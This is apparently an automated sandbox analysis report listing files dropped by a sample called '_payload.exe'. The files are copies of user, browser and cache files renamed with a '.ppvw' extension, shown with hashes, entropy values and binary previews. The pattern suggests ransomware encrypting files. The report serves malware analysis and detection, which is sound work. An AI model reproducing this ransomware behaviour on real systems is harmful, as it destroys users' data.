                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):0.6705738384678229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:hTV1qyAi3f6rnZe9UwFYQ7O+bL/wogPZDTFbMlHvxJGkj3XNs3sI1Zb:hTP3h3fqZTwFCDpbsikTNGd
                                                                                                                          MD5:E2D5516ED1D0A60D797C42585C5477BB
                                                                                                                          SHA1:6952804A43581C9F1B0D26E718D505523FAF0B8D
                                                                                                                          SHA-256:54ADE27DCAAC6EC745327E9D46628269BAAA68002056D3818E33EA3905B3AB12
                                                                                                                          SHA-512:904E23A72D179EC1E658111BE2A81D435D4ABC6966572B278101A3A4812BE7F6BDDC6FFEAA8395CE24DE2AD450EE3A4A07D265E804BFFE8A96ECDEC2ECCC6298
                                                                                                                          Malicious:false
                                                                                                                          Preview:......$1:s<y...>T!.....f.E..t*..&e.1..y.......Z.R).!z...~..o9J.+.u.....%-ji>:..2x.x..@.'.T....;...D......yEWC..H.....;.....?..D.O.......?Q7....U_...........J .....]..).s.....E....1'.'...{...B..r'..cF......z......3%%M....R.".lc<..o..yU.....;{4KB=.O_8^+Z........B..7*+..r.q.+f..4...|...../..W.m.y[..-@l....... ...x...o.`.9...:.g.].?O..c..50z.y.h.7...R.._..2...2..R2.p......b..3.[.5.crq.[.J...............A.'(..Rl.....0<le....b7._.C/..?.h.3.^.j5..]L....U?...v/.e.=..X^.C\.s.A..G..p.M3..z.m-.d....4...s......b....a?...(!..........o.:.p.2K5.S=._H.`0#....?3..abK%..d..z.......6.].5.5..._.b1.=-....W.e.Bf.=..]...U.ry........[[}.-.x.!\6.S.L.,.-...V....S...JG)..Cp...../......#X...b..@......8z.ab.Y.z..[i.*..?....[4.J.......c.V.f.c.".6VrVv....h@......;.pG.....l..y....cN.N....[..(.]~1..K.}....\C..~;c.s...sP.........A....9D..J...s..Z.k4.D..'.2.J}..4..N..4iO...(..h..r.X..L......1....p.....i1...M..v.F..............!QZ}.~...C....)<.O..3U.<....l.....Zp..

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.988402371076113
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:/r74VqmriwjQ0Q+L+DI8StzNlB4WW+kfaYnybUKXxQ03jmNjS:jkX7HQ8EIJ/WoUgQ03jmo
                                                                                                                          MD5:E0FC0460FF902E0596FEF9DD2D83EE1F
                                                                                                                          SHA1:01C427E6733CC63E1F5D3CB913BA3720F4845A10
                                                                                                                          SHA-256:C7BA79F51E57479DA147D7D728428067F6D8D1DFD723ECFE82E71D68F237D06B
                                                                                                                          SHA-512:34BFF3951009D2B517902A491D1A268852574D5AA6CA514F8812F1B032B0E03CCDF7B74E3876CFAA8C7A1F0A9674CF64A9BC7FECE82D5DBEAE2BC099C4A78575
                                                                                                                          Malicious:false
                                                                                                                          Preview:........B.dfnb._.....A...]_.>.o...Bw..0.I.t.!.P?-.((.....]K.P...."d<..q=7.U.....g.2....7..e5....[.....z....#......:....&........4j.fE.-..e(..$N..%.Vf.j..MA....RE...n)R>l...7_.%Qh.#..]r.y......q..C.<*...{A.qG....=.....Ky.(W.~...8.>oe....e?.I..Y.....p8Oh..4.!.g".C..j................c0[.ze.Q...t?....e4..7......t.P......[.....,fYa..(93}.DY....Kb^5..w(.i....u...i..p...]r...CN.5.,.#>.t.....)aB...8.{6GN6#G3.<..n..Z......B.%.klv.....^.l......5.#.)|.1......S...P.....fM.G..b...{.:q{k.......|P:fXl..>...9.p.R.)... .*..J.vj.....4.6.$k.1.Y..K.%v.$d.1..../wG.[F.j..G..7CF.7..8.^........g.........T).R..d....,k.... ..#b.b....J......>..m.u.e...Hf...$......F.b..._\.N.;...e.g.AJ...{B,.ZC..0..m..R.6...J.c.....9ZI..!..........9.n!...4.....M.v..._@.b.Y.K.+.f......N}F.9..m......A.p.^"..K..,.W.-6."m{.KN..4(..w^.. n*..=..L.RR,...te.k....^..<... M..i.-.....k. .B......T....lV/^,..+G..~...;.../..A.{%w..TI...$.."o..0..^e+..X...[.R.fXf...r..1..a...ex|B

                                                                                                                          C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5767502
                                                                                                                          Entropy (8bit):0.7568538108239867
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:I19+dHEn8qmIumLOi3qIMkVPf0EztUArdTvxdSa+d+gOrOuWxWk3m+cun4CfYjUU:I19+domHmLOzUH0EzX5TZ6R3b0X
                                                                                                                          MD5:CA04706AF30DB3393EC0DB5C4A802FC0
                                                                                                                          SHA1:699690F979713669EF6062D4181B303E73405D98
                                                                                                                          SHA-256:641C7B831C0A6391CF8F88E38E0E9AC31686813D647FC24EA190B312949FB92D
                                                                                                                          SHA-512:702FE4536EFF3D6D42258AC81AB0CAFEA0989D2CD7F5812A5D95B8CB19690948BE408E3FDF87E67D42727F2AB33E35A59380674C91D8798E63D7786F85EAB5A6
                                                                                                                          Malicious:false
                                                                                                                          Preview:....+q.q.....@v.i.U.J,U_G..-.f*.....Iw..v......G....c.c/.....&a.}.kZ....U.l....]../Ye_=F7P%.'......g....'..../..m.......F.Kp%..%.I...c.0)^a...~~1h....YL...N.....kt....J.hvL.T...T.3OA....!..g.&J.*...c.dH..!gLG...........N.q.8E..........i!|....[..z.D<[d.....N.D.......R.T.<.ZN.Z..+.qGV.....'.YL;.hC..:#l|q.....h>.Z..i.v@..'..[..~.....;5..?....u.G..Q .'...p.}..m...b....{.8uv.:%..25.....R.?...._qer.T.{.2....@Q.;.Hq4.J(.V.|...W.......:...0H}.w3...m.....2....o.P.T8.=iH...Pr0.k.......<f......B1Ax}.T.....r....a3.o.^a...j\....7.,..K}TEAY6...Z..{..#.]..o...vx:.H..-..8..C.o;..&......c[[..Q>Q.#N..`Y..L..L...#..I..8{8....}].*.B.M..O.....2.1..(Im4q.R.\.U2T.: \.tZ....D..]g.D.L....bq..Tq\.;.T..I....?...B.....6...l).f...hd{..2j.q..>X<\;F..>.3...d.{J..4...].Dj3EV.Vn..Y...C(...)......g.........b..7n<.q......].Zd..?.....\.8ej.||.s.-..........*.6,O........qO.l......k.O7..c...?|.t...{,.m.....HIY....A.u.M.....?#.-....7h..>t.b.w..,.g..ENN..!N..V.-.D3.<V....]..

                                                                                                                          C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49486
                                                                                                                          Entropy (8bit):7.996581114686016
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:B7WoSzcMUZ5eri0GZi9ndtYoAEE9axflT2/MIVEE3coAQ3I1gvQt:FWoSXUIiRqndtxAEE9a/HEsoAQ3Iyv2
                                                                                                                          MD5:4EA2D9425ED008500C5AD8056BE8A727
                                                                                                                          SHA1:404C27A8F5285CDC20834F919B8E9D5026A9C984
                                                                                                                          SHA-256:975DB2B8155910005EEEC63A79B25461DAF8AA2F40A16CEDA43235816BC85A27
                                                                                                                          SHA-512:252F919F32846477DF1FE8120723D33F054C53EF7A2CD1EBB6AA415F7864A403FD31BA1F42F39D74E6DB7AFC11508564A83E39E7828073F0E5A00976E98DD16C
                                                                                                                          Malicious:true
                                                                                                                          Preview:SQLit.|.(...."`..?O...kKv..........1""r..O..r....=.'.[.2..S....2.l....d...P.h.....`...s....$.R.V9s.&=$W./.6........ot.q.e.F/.5?Cm.......~.?P..d.. ....;.sY..se...xy..U"....T....8....|...8.XS.`:.....h......L+<...........7q....9...85.K.H4\.m..SU.Q.0.....s..........n..tR<7y.5..1T..M..]o0X....B'....`.2#[krb...>.k...U.......P@.;..0..>.JP........SA.).D...G.Wgy....l.X;x@A.hU./?+A.v.d...XX...7..S..Y.tD.\...........]../.>.Q.o.....mx.7..H.6...V.B.M.)RQ...:..d.9.....HH..P@..(^.I.....Pr..%/...<..~........o.h[f.G.....'....C#.v)!4.,...........;m.c...v:...ln........._.,..........|..1EQ..l......E.FN..O.Z..4N].j.i..m..gD../K.U.,!.RB/........<.........H..?.fV.."f.m....... O.E.x.l..5.3{...G....j..(9.i.@.a0y..c#,fLB..]m.o.{],.'...O...n...E..aQ...#...l.V...6.....{_P..g..m..4...?Bm.H...q0.NI...._a........m.h..2k..-n.....z.....@....#..e.....4.....p...].A.M 0|<g#b..b... .t...u.........+........N..l..>...9..J...Ln..T.0K...:...)...4.0...,C....L.

                                                                                                                          C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):354
                                                                                                                          Entropy (8bit):7.196188461424796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QVgWzNW9I145KPtdOPzWMDlVnyX9g6fC8iaEZ0UbF7/N6W/xqbJq5PDTcii96Z:QVgZ1AtdyzHyX/5h41EW/xeq5bTcii9a
                                                                                                                          MD5:D17902E65BAE74DD00E7199CC410D700
                                                                                                                          SHA1:AFB0FB6FE62BA792AFFFFC5333C8C63BD68C9ECD
                                                                                                                          SHA-256:92E3B083CB922C74FCF349FE7D76477324833821EB1BA250706B5785148ADA10
                                                                                                                          SHA-512:7F724936D58512B56758DD4354B5C53903C70855194B6D38E9534D530278BEE6B24F1E6893F3C525E5538B92FB95284AF03AD7AAFFBCEC4090D64FFE48813030
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fu....!.......ux/.cuH3...B.=........o.,...r.Z....<*[....pd.d.T.l!.. .!![.5.w3l+...c..%.I.......K.p..~.:...(......A*.3o..?.F...............tC.....?....p1.z.........]..k........^....S.;!'...8...{..{5....f.0..F.d+Ah.y.....o.....l,..w.].<.t..>G/s....w..I.~..IwiU.F..[7phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1210
                                                                                                                          Entropy (8bit):7.817544821949396
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SVGVh6DtISnYf5RoQUqDyThcVa+Zg+vzI3RN0zd0g6+bD:8GH6DtI8YDoQUqD5ZggMN9g3D
                                                                                                                          MD5:0FF051511693FB4D52D72EC807305F91
                                                                                                                          SHA1:569FC3FF3CFDEDDE42398600E96F8D2843EE6493
                                                                                                                          SHA-256:D3146F2B4CF6346ABE12CAE09DAE5B7978ACD2D4BA3D3B6E44826A4F0BD05358
                                                                                                                          SHA-512:AC356507B48139178065656E8F3980E4320D4BC2A30BD67D9071EC9D2BDDBA3A9179BF980C69B44D02954F315CEFD5BB238E3F5E587770F734CFBD926A0F2F91
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fu..7A.h..w..&<....q.....\..u.Y.>..1.p....a..{.0..Y.......T/.?....5%*.()W%.pj..^...ji.:.......5V.......{)H...GVh....D...^.W.....&?M;.7..L.~.U.........9..d.....4..........`B.....]. .e73s*[7y... ..z....]m..).7..4....>....g.sq..........%...]5....J....o......w.R..G.f.>%..DF.....,./".].....{.G.........:.r;e.J...\.l....>.|........9Og-wsqb.j.1c.....y.>...%Y..2$2.U*..+...o....k......8.......q.......w.oOJ.:.(.?.&.t%X.. ....[..W..../I...`...j..e..-Hk...$.. a.-.N.eC m..#.RN.........^=....;OZ.$e'.L.?...>8.....L...^^.6..=..n.M.G.ffc4.6WG..9....R...........-.]......l..KE.u...c(%..*.....R{$V......d..p.4.+..LT...1.mr...J.Y....n...Z.qc/.(....?.^.[f.^W.Z.W.kC..;...d.j~......b..*.kF..\-<..b.............=.....E...aE....g7..5.&....#+....E..3.z.....0....B6T.r....t.3nN.>.h.o..a..n...a....Hk......qa...b..)..P.5.@...-(.T....\.U...E.......Y..;.m1.N..)p{...b.!......)I..4D.>.0z.".!b_#.(...H....U...._..,.Do...^.m.:4'}_..P..`5..}.......4Q0&..H.M...M.. {..$..a.h.'0..G(...

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.990740001662978
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:bWaBH7rmQQ9Q54VCoczEoAm2eiGipkC0+xd5lTVHO4bf6X4WmKngL:bWaBH7rJQ9ctoPtVzP5HO6656
                                                                                                                          MD5:B896181F8F57E847288D350165483B7B
                                                                                                                          SHA1:3202B0056149B44836EC2F296994F6D62EC8B951
                                                                                                                          SHA-256:4FC04646BE9968185E5F7914FC98EAF4A1F53E65199075D2BFADA1318F3AD818
                                                                                                                          SHA-512:65298F9FBA711E8937EAB5B8242D8931D5C1F0406E13CF427A25B8B11DFFB204F6E90F39EDD0A7FA64C0AF620453DD93549E636F2086DA258D4A1B192D5902B0
                                                                                                                          Malicious:true
                                                                                                                          Preview:...@.w.p....`..IR.....p.0.G#..=.oQ...L.`........nY...o.5...7....c.U.k.l.t...SQ.....IZV..V.A.>.5.*.([..\)P........2L#$.u.e.tcTW17"...u......Q..YU....9..[...N(j.....d.....0..ZB7...}....L.J.z....h..<...~aB.Q..#.T..yO..&3.f...3......g....0?W...X.N:PM.....L|f.r....(..l..p.N.T.z_...,7S.@.mv...2D.K...r.G.v.{L..h..Jj......T!..,....M..D... .t.. !\.RRx..Z.Bh.M...7....._.o..J...H..D.|..!.}8R.)...xY*.v..c...uL...;t-.~...t..;~.TNCL...Tu..B!..`-.x,.~.=P.M{..$..,.x...Wv..f..A.....z4....@....rj>D{*B..@B.(.:e.....y...[..1!.k\.ld."A.$.t.....L3...D....$..ee..1.....$Z.A^#.X.j..\..LB...G?2g.R...Gt..4..A.^t(x..../....W9f..^.....I&..%.^.....v.v/......h6.....\....%T.j..Rq..S...r.dZ.4.9......A..^.....o...'.P..v.}.B..G.&.LU{5..A=...s.._f2.$..`...c...{K...=.C.Y.f.g.......6.S.!.$<W.]Yl..j.P...U.El.gy;2..<.1.k..0.....!bkM...K. .......3.Q..+.[.,.VYQu.e.bt.yT.5 ...d|...l.DM..5.X.s...N.KM.....=..Y....7.TxC%..........g...5..lvz..23k5...r.?P.g..j....f_..c...^iL{..`.R...Td......

                                                                                                                          C:\Users\user\Local Settings\Microsoft\FontCache\3\ListAll.Json.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162608
                                                                                                                          Entropy (8bit):7.979150369891975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:l+pDIGU+H6LZrnT2iUCQn9u3m0ygkBs/x8FU6/gmv8pHYGh:Y3U+HCG9ZE3m04s/h6xvk4Q
                                                                                                                          MD5:C5F3FE07D596BC0682950D4126078FF9
                                                                                                                          SHA1:BB04161CE6B7BA9A43FBC2EEFF021D6BE59915AC
                                                                                                                          SHA-256:090B55E5FDFD70BE66603F109D2AB200B7C19803C6ABAFCA037F101007515F12
                                                                                                                          SHA-512:85FE42BAEB4FCE778370A0D2A70CC62E7EDB60BC0420C571FEFC7E80ED81B99DA43C5B97D7676E24DF7C582E3AAA222B87B9A55C42FE6A68E9993DEF3DE5D5DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"Maj4.f.i...._.T.^...h?bOA.n.y.e.....S......2.kVK..a^...S......\..../.2-.AR.....~...K..!O......"N.8.-(.(.r*bn...8-Z.q.e*..]..O.5....L.......|.D.......SD......u. .T.`..r.:.tW....x..U.i.....Rc..Ge.Q+Br..Z=.....F......1..P..m..W.%p.....oS4.'<{.1A.V&l|.v.n.~.g..2.n....(M...;..O.....&."..9N..>c..|.........o h2M~....i4..$.:....yx...p..V....+.W1..j.,..yx..l&......x3..c....r$...Z..D..FPQ<...|@.a.t%..:....;.0...{....+ld.T.^..!..e.N@...r.q....h./.....U....+(V.j.#...\x.I.#b.s/4.~....C.._.1.GX....K..*.).....-.K......5.Y...d.u.._.6{.q..I.+....P.Mno.:.q..Rk..".I....(-.s.$................?K]...v...M@,..x+.C....r......G...d..U$[.....|..=8i..z.^`*.M.....].1,.....3...H.a.h'.....6.....d...7..Zw.6!CAy.B..rbT.8.t..Hly.@..~3...h9..}.2I......L..........w.R....@..hO9n` .p.. ...7}zF[..y....,.h\-z....{........>).[...Z...: ....Y.w..A..}@t....'L.../J/.m...0.3.w.....b.N.A.=.x..O..u..S...0._.{ft.M.S.K.n..f.0.(..`.....g.R...bF.....N..(.i..x....O...v.. hb...t..bgHHf

                                                                                                                          C:\Users\user\Local Settings\Microsoft\FontCache\4\CatalogCacheMetaData.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2203
                                                                                                                          Entropy (8bit):7.914630780890162
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YZHFReIgpZF+jXuF5c+LRrYFuItY1HSED:YNFkIcG7S5c+LZzImyQ
                                                                                                                          MD5:81E26A7BC73F09AB0DE8CE0020F3E9FC
                                                                                                                          SHA1:AEE16C9E522E667B4AC715D74485BCD71A3464AB
                                                                                                                          SHA-256:F1ABF631CE5C5F512ECFB634F8344DF9E4DAF39110E9B5CE6162A430E48BE516
                                                                                                                          SHA-512:800471675A9E123FA42F4111EF77FD20C6D165E12DED55CC7E5DAC442716F0DC0326FFCBC786B65BDE24230CA8211A615AA6816B1DF7601061D515D11FFFCD80
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlh.*.......I.].....nh.h...Q...y......V.^-..9.....r..x..=...".|....^..**B.26.:.1X>q.u....X.._..]D...I{.....(.11!.,z.IiWL.\$.z><g.......M.p........A.M..{wm....(.S..ao2....ze......N.F='Qr.9x...U...DB...X.....0?{ !...H3.s Y..H...Z.".p.C...eb...m.)..~.'...7..Or.>.-gd6F...:.[......QR...u....@s.gI..u.WP.._...e.A.k....?..-.5..=7[V`xWQ.7O...m......-...j.8...$l~.3..(...........m...$.FAi..W...r...Bo..;.w..4...1'....^.lG=.j.....].g......".n..o]...>..1h....i.O....R%.1..U....D.../..$..a.F..B........^.N...)......S.H..N.g...^I.<..-h.4?.V....W)....=...;..<.....U,I.5.r..I...R..%}..5..'"..1...q...(D........R.....ye.t..e7.v..F......b.}.hK.).,.NCo>R......ul...Wx?.Xv'.......... .........aV.4.;.....l......=..@.t."...:..8..j...s.sez..Y.|..M[+..~.)...9......L..u.[.w[.T.L.OZ/......=~2.zGslZ.S3..^i.!..}.r..cN..$.H...pR..p.Q.%.U....=G..3...s.1)........D......#.fm....g.FH..~2....+5..>.p@."Y....^!&..K....x^.:z..%=...hK...d.4...c@...O.;o....=,F......H".....#?.j..?.

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.chk.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.977077555466775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:0KbIN9m4qZ1V3BWTI8vYOYejYuV3tF5NCEN7A6q3ywosL:0K0rm4W3Mt3t/NblDq3yPsL
                                                                                                                          MD5:699F953F3E5DC79E4EB5217D5238CF8F
                                                                                                                          SHA1:2B96EF587CD65B03D99F768AFF38AFE1968DD53F
                                                                                                                          SHA-256:9C5BB360CE117D925B6B0BDB1F55EEB8C15DFA88F6354121C64CB1AF02C24DFD
                                                                                                                          SHA-512:9F3ABB5E2977D2568068D274C727FC7325372AE57980C1B669AF467C5A580E31776E8235256222FEC7F2C7E612EB27568E764C52A06B72A99A032DBA7E840A56
                                                                                                                          Malicious:false
                                                                                                                          Preview:A.....[++}i.]......K........l..A...sr......cr....w.y.N4m.j....>.....G.~.7........]RO.eU..!.#...g...1.....Yr.F....>.:.9.]......2O....=..qf..yPVKI...T...|b.Nj..P'..<[kt..a6B.m.s>...`....P.....?1.A.n......owr[.Z....^2{<:.I.h.%...B....Z..A.I:.,...1....F..t.q..E....5#.!F|.n.W....&/.....m.8\Q.5.D.f...~.....bdQ:!.....b.7,..s......1.A.8w...e.IL...i...V..h..)".|^!....'.)4T....(.....*..w.>..P.b.?./....H...T....l.N...o...E.3....;.....L...N.I...I}L......w..A*4.p.46E..9... .%.B%.]..&....&]...B......x.M[...t.Y}1.Z@W...\%..o].....P..5.(n..~f.X...&B.d..U.XL%..3.......0..l.v.4...%.^.j..y...w....L.Z.5y.A.S. $.o.....5.%.P"..'.A\.=*...W..................a}..1qreVn.y.:&.....xk...n.J.G.u........9.F.#J.$..Bq....;9..573....1..a3.On.O.'XpxZ.0...b..4.(..w...3.Vp.$.}..P..;O..........;.n"$.}]..FF$>.F...-.h.p".....W..OPE...<~......>...c..r.[E.5.C.k.x..,.y7..j.}P..]..<...j.n.Ud...3j_.|.S.h.P...j....y[....Z.*...r..P)3..9.v..|.B..A.....O.3l.De..8.....f.`y.....A4.?..E.&.

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):4.010050562658567
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eKFTqgFShKQzaePS9oL4AWslWsIlAoGqx4dwZA6xQA1NOT7VRPDkSSnLRrR7tcIH:eKBBShj36o+sWs2GyQwZYEBX
                                                                                                                          MD5:F45080DDCF7FEEDDFD7DF29BD9070E20
                                                                                                                          SHA1:7EA1B91EDA11F60BF591DFE446F3C90DF89D62D7
                                                                                                                          SHA-256:E6AE461480922E3751AAF05049708C32149361EBD3337AFF7D00071B61CEBA59
                                                                                                                          SHA-512:333F0D1754180B9AA4721901C0910F7B4268B91787A4796BA7F02A4E79DD3B2E206ACD177F4FAB5D4E5601C433B8394F19C1CD74C5D8467FC4F3F9C34BE6B9D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....ep.S.....(.M..h).5`..+.."o..}.N..O..z.r.x....)L....fq..>Lz..o...L2AM....4.Y.)..N,...{F`.?@k=..lWC...i.N...%.c.0....,...>.}BY6<1.7$.....O.1GH......W.'.\S..`..#..|.].0.X.../wB.....{...fR.W.R<.6..-$...i...[...q..k...H...<........G.....ySSe.v.B......rQ.u:.a..\.4.:.D.J...?*..3.Fr..^..R.|n.K....A....>r...........v.0h."x..@j.@.n.....fg......K..^....k....D...}Xg......Rl...Wi..V.(.-5r[...n.Ja.8*.%..i...T..c.B........T..5sF.O.km....^9"N...p.C.W...N....*b..$.n...}...j..J.)....f...xh..2..P.a?.;..\1..>....[..G6H..y.v...aA....Z..1...Vb...,}c..H.Ss..L..{.FV...hp....}2?...O..KS.1^:.u..*...#.....i..X.....6.,..Vm...........6i.r....... ....w.\[`.|.|[.r...w.!.....0..T2C.{W0.y...Vh.$..Y...K..U..u.f.m..j..7...[...6...f..J.o+....."........P4m..^...o;...{?.Q...KJ._2a...-..r}O<.f&k*...Y.RY.&>l.-S...:6.TvRA.0....ms1buT2....&;..0.N?tB.J.>Gj G....md...p...f..e...|..eX.R....V....v..<..zy...[.S.).....znJxe].m.].6..../O...'@FuQ...C...C.....f..b....N...._.w...

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2077906203254396
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:3OF6Y8CCu8FXDy5kqhzpP/sWKFARltyhqLY6DE08O1sByp/x/R:8FiF2Cqhzp8nARbGqLY6A7O1+yzR
                                                                                                                          MD5:F5D69C0E904F9C1F08EFF7802A308451
                                                                                                                          SHA1:1419655816DCD949E817288E7B6E5A10D86F1C5F
                                                                                                                          SHA-256:D5C4DBEDA26F40B2DF74A0A58809B12C04A5644F85E318465520092DEFA14AF7
                                                                                                                          SHA-512:4181064D9DFF6831A8DD18EA0E92E2746FC22A10ED93CDA65DD126BF3BB01BDA5D912A76D0628A51DE4B81F7DFA8D72B7CFE0B3E7EC229484225A98720C8687E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....*..%-...A?..n....&...')j...9.|..b........._.c......I.Ep.......va..t.E.TMW.'..K.~..5E.Xg.Cm..@L:.?.!.~...D|@...^=..#v.v.C.-....,.5n......=F...=!..7..,...c........-o..o.)0....g.A~.......N)uw`1n?.6..Y:O./.a.N...`!:...5..2...;N.Pz.<...w8}......2...O.=..9....+..\......$V...~%..(.b8/X...;f...]~..9Gq.d....+.)f.*.i.........=..6...S)R..*].R.62M(.bf....jo..p.s.c.V..9....j.s..I....I. }G.?.."..^.^..x.hD..q..p..f....y.Z.w.f._...('....6...~U.@O.T.x6.?K9}^.....>.$y..Z..1.$.r.........2..+<'F.w.........s.l..`~.0.%......#..b.2T.]L.M...;c.t=>H( .4...7{.h......H.-.NuuBH)9S%.U..S.A.h.O.~|c.F.e..C.:x.(.G...t.Qw.Ps,.O.'.....%ztGv.p..j..5..$..&...l....i?.._.*IJ.@2.......Igf2..<......&...}U...Q..%h;...!....LY..O.G}1W.g....E..L]..a.n..K....8.B>pn.,z..S.*^.Q4b.vu/..1j.R..7.t..b....=.G..{...(m..B.^.mz'..p....J~.3.e.'D.U..m.-B:.*..7......Ex. .`..8..n...}oY'h.Yv$c..s.Tv.K.w#f.A...:....'..`.$.).'..U.U..3`?.Z.f.".ib3..,W^.Za..K.....G.A90d.o..4e...t..`.ta|]>.I..a.W.

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2074036102163515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:koXebxhrOHJePu43PdUhkEBoHlbZX/zUjSybzocgYZ0P/+g:nMAHJePuQMvqHlbZXLUjrbzxgK2
                                                                                                                          MD5:4335DEAEAEAF567313A5AD0B7F181C3F
                                                                                                                          SHA1:50547846CA7DAE62407243A6164EF1523487703F
                                                                                                                          SHA-256:7FF626C73C8F1E09785C550E909B0F19495CFC1110DDB1C5E6A3ECEDF889A738
                                                                                                                          SHA-512:F0460E6C9E2F35FAF2518E381655275F4571CDD922988EC4EDF1692C58CD024AE3DD723D21BF7DBCF599A7C5E404DF8B5D59AFE3F92FE9AE19E6F8FFD24B462A
                                                                                                                          Malicious:false
